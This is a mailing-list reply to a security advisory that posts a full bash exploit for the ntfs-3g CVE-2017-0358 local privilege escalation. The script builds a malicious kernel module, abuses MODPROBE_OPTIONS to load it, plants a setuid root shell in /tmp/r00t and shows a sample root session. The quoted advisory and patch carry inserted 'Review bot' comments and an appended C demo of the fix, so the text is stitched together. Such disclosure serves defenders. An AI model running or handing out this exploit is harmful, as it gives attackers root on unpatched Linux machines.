Message-ID: <CAPgP4gzYwuX9bdGR6vj774=1PY7Vhv3f1aSfZehB20h0mMoiyA@mail.gmail.com>
Date: Fri, 3 Feb 2017 23:14:16 -0800
From: Kristian Erik Hermansen <kristian.hermansen@...il.com>
To: oss-security@...ts.openwall.com
Subject: Re: CVE-2017-0358 ntfs-3g: modprobe influence vulnerability via environment variables

#!/bin/bash
echo "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"
echo "@ CVE-2017-0359, PoC by Kristian Erik Hermansen @"
echo "@ ntfs-3g local privilege escalation to root @"
echo "@ Credits to Google Project Zero @"
echo "@ Affects: Debian 9/8/7, Ubuntu, Gentoo, others @"
echo "@ Tested: Debian 9 (Stretch) @"
echo "@ Date: 2017-02-03 @"
echo "@ Link: https://goo.gl/A9I8Vq @"
echo "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"
echo "[*] Gathering environment info ..."
cwd="$(pwd)"
un="$(uname -r)"
dlm="$(pwd)/lib/modules"
dkf="$(pwd)/kernel/fs"
echo "[*] Creating kernel hijack directories ..."
mkdir -p "${dlm}"
mkdir -p "${dkf}"
echo "[*] Forging symlinks ..."
ln -sf "${cwd}" "${dlm}/${un}"
ln -sf "${cwd}" "${dkf}/fuse"
ln -sf cve_2017_0358.ko fuse.ko
echo "[*] Pulling in deps ... "
echo "[*] Building kernel module ... "
cat << 'EOF' > cve_2017_0358.c
#include <linux/module.h>
MODULE_LICENSE("CC");
MODULE_AUTHOR("kristian erik hermansen <kristian.hermansen+CVE-2017-0358@...il.com>");
MODULE_DESCRIPTION("PoC for CVE-2017-0358 from Google Project Zero");
int init_module(void) {
printk(KERN_INFO "[!] Exploited CVE-2017-0358 successfully; may want to patch your system!\n");
char *envp[] = { "HOME=/tmp", NULL };
char *argv[] = { "/bin/sh", "-c", "/bin/cp /bin/sh /tmp/r00t; /bin/chmod u+s /tmp/r00t", NULL };
call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
char *argvv[] = { "/bin/sh", "-c", "/sbin/rmmod cve_2017_0358", NULL };
call_usermodehelper(argv[0], argvv, envp, UMH_WAIT_EXEC);
return 0;
}
void cleanup_module(void) {
printk(KERN_INFO "[*] CVE-2017-0358 exploit unloading ...\n");
}
EOF
cat << 'EOF' > Makefile
obj-m += cve_2017_0358.o
all:
make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
clean:
make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean
EOF
make 1>/dev/null 2>/dev/null || echo "[-] FAILED: you need make / build tools"
cp "/lib/modules/${un}/modules.dep.bin" . || echo "[-] FAILED: linux-image location non-default?"
MODPROBE_OPTIONS="-v -d ${cwd}" ntfs-3g /dev/null /dev/null 1>/dev/null 2>/dev/null
/tmp/r00t -c 'whoami' | egrep -q 'root' && echo "[+] SUCCESS: You have root. Don't be evil :)"
/tmp/r00t
echo << 'EOF'
$ whoami
user
$ ./cve-2017-0358.sh
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ CVE-2017-0359, PoC by Kristian Erik Hermansen @
@ ntfs-3g local privilege escalation to root @
@ Credits to Google Project Zero @
@ Affects: Debian 9/8/7, Ubuntu, Gentoo, others @
@ Tested: Debian 9 (Stretch) @
@ Date: 2017-02-03 @
@ Link: https://goo.gl/A9I8Vq @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
[*] Gathering environment info ...
[*] Creating kernel hijack directories ...
[*] Forging symlinks ...
[*] Pulling in deps ...
[*] Building kernel module ...
[+] SUCCESS: You have root. Don't be evil :)
# whoami
root
EOF
On Tue, Jan 31, 2017 at 10:44 PM, Laszlo Boszormenyi (GCS)
<gcs@...ian.org> wrote:
> Hi,
>
> Jann Horn, Project Zero (Google) discovered that ntfs-3g, a read-write
> NTFS driver for FUSE, does not scrub the environment before
> executing modprobe to load the fuse module. This influences the behavior
> of modprobe (MODPROBE_OPTIONS environment variable, --config and
> --dirname options) potentially allowing for local root privilege
> escalation if ntfs-3g is installed setuid. This is the case for Debian,
> Ubuntu and probably Gentoo.
>
> This problem is in the source since 2008, maybe before.
> The fix is easy, use execle instead of execl and pass NULL as
> environment variables.
> -- cut --
> --- ntfs-3g/src/lowntfs-3g.c.ref 2016-12-31 08:56:59.011749600 +0100
> +++ ntfs-3g/src/lowntfs-3g.c 2017-01-05 14:41:52.041473700 +0100
> @@ -4291,13 +4291,14 @@
> struct stat st;
> pid_t pid;
> const char *cmd = "/sbin/modprobe";
> + char *env = (char*)NULL;
> struct timespec req = { 0, 100000000 }; /* 100 msec */
> fuse_fstype fstype;
>
> if (!stat(cmd, &st) && !geteuid()) {
> pid = fork();
> if (!pid) {
> - execl(cmd, cmd, "fuse", NULL);
> + execle(cmd, cmd, "fuse", NULL, &env);
> _exit(1);
> } else if (pid != -1)
> waitpid(pid, NULL, 0);
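Review bot: the `execle(cmd, cmd, "fuse", NULL, &env)` line is correct only because `env` is a single NULL `char *`, so `&env` happens to be a one-element NULL-terminated envp array; that is easy to misread and easy to break in a later edit. The same empty environment reads more clearly as `char *const envp[] = { NULL };` passed as `envp`, ideally with a one-line comment stating why it must be empty: this branch runs only when `geteuid()` is 0 (the setuid case), and modprobe honours `MODPROBE_OPTIONS` from whatever environment it inherits, which is exactly the vector described above.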
> --- ntfs-3g/src/ntfs-3g.c.ref 2016-12-31 08:56:59.022518700 +0100
> +++ ntfs-3g/src/ntfs-3g.c 2017-01-05 15:45:45.912499400 +0100
> @@ -3885,13 +3885,14 @@
> struct stat st;
> pid_t pid;
> const char *cmd = "/sbin/modprobe";
> + char *env = (char*)NULL;
> struct timespec req = { 0, 100000000 }; /* 100 msec */
> fuse_fstype fstype;
>
> if (!stat(cmd, &st) && !geteuid()) {
> pid = fork();
> if (!pid) {
> - execl(cmd, cmd, "fuse", NULL);
> + execle(cmd, cmd, "fuse", NULL, &env);
> _exit(1);
> } else if (pid != -1)
> waitpid(pid, NULL, 0);
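Review bot: this hunk is a verbatim copy of the lowntfs-3g.c change, and the whole fork/exec-modprobe block is duplicated between the two front ends; consider moving it into one shared helper so that this fix, and any later hardening of the modprobe call, cannot be applied to one file and missed in the other.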
> -- cut --
>
> CVE-2017-0358 is assigned to this issue by Salvatore Bonaccorso,
> Debian Security Team.
>
> Regards,
> Laszlo/GCS
--
Regards,
Kristian Erik Hermansen
https://www.linkedin.com/in/kristianhermansen
https://profiles.google.com/kristianerikhermansen
View attachment "cve-2017-0358.sh.txt" of type "text/plain" (15934 bytes)
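The environment-scrubbing fix quoted above, as an added example that is neither ntfs-3g's nor the poster's code: `run_probe()` spawns a child the pre-fix way (`execl`, child inherits `environ`) and the patched way (`execle` with an empty `envp`) and reports whether the child could see `MODPROBE_OPTIONS`. The `/bin/sh` probe command and the `MODPROBE_OPTIONS` value are constructed for the demo; the only assumption is a POSIX system with `/bin/sh`.

```c
/* Added example (not ntfs-3g or the poster's code): run a child the pre-fix
 * way (execl, inherits environ) and the fixed way (execle, empty envp). */
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Constructed probe: exit 0 only if MODPROBE_OPTIONS is unset/empty in the child. */
static const char *probe[] = { "/bin/sh", "-c", "test -z \"$MODPROBE_OPTIONS\"", NULL };

/* scrub != 0: execle() with an explicitly empty environment (the patched path).
 * scrub == 0: execl(), which hands the caller's whole environ to the child.
 * Returns the child's exit status, or -1 if fork/exec/wait failed. */
int run_probe(int scrub)
{
    char *const envp[] = { NULL };  /* nothing inherited, nothing caller-controlled */
    int status;
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        if (scrub)
            execle(probe[0], probe[0], probe[1], probe[2], (char *)NULL, envp);
        else
            execl(probe[0], probe[0], probe[1], probe[2], (char *)NULL);
        _exit(127);                 /* only reached if exec itself failed */
    }
    if (waitpid(pid, &status, 0) != pid || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}

/* Set a constructed MODPROBE_OPTIONS in our own environment, as any caller of a
 * setuid binary can, then compare the two exec styles. Returns 1 when the
 * unscrubbed child saw the variable and the scrubbed child did not. */
int demo(void)
{
    setenv("MODPROBE_OPTIONS", "-v", 1);
    int inherited = run_probe(0);   /* expected 1: test -z fails, variable leaked */
    int scrubbed = run_probe(1);    /* expected 0: variable absent */
    printf("execl  (inherits environ): child saw MODPROBE_OPTIONS: %s\n", inherited == 1 ? "yes" : "no");
    printf("execle (empty envp):       child saw MODPROBE_OPTIONS: %s\n", scrubbed == 1 ? "yes" : "no");
    return inherited == 1 && scrubbed == 0;
}

int main(void) { return demo() ? 0 : 1; }
```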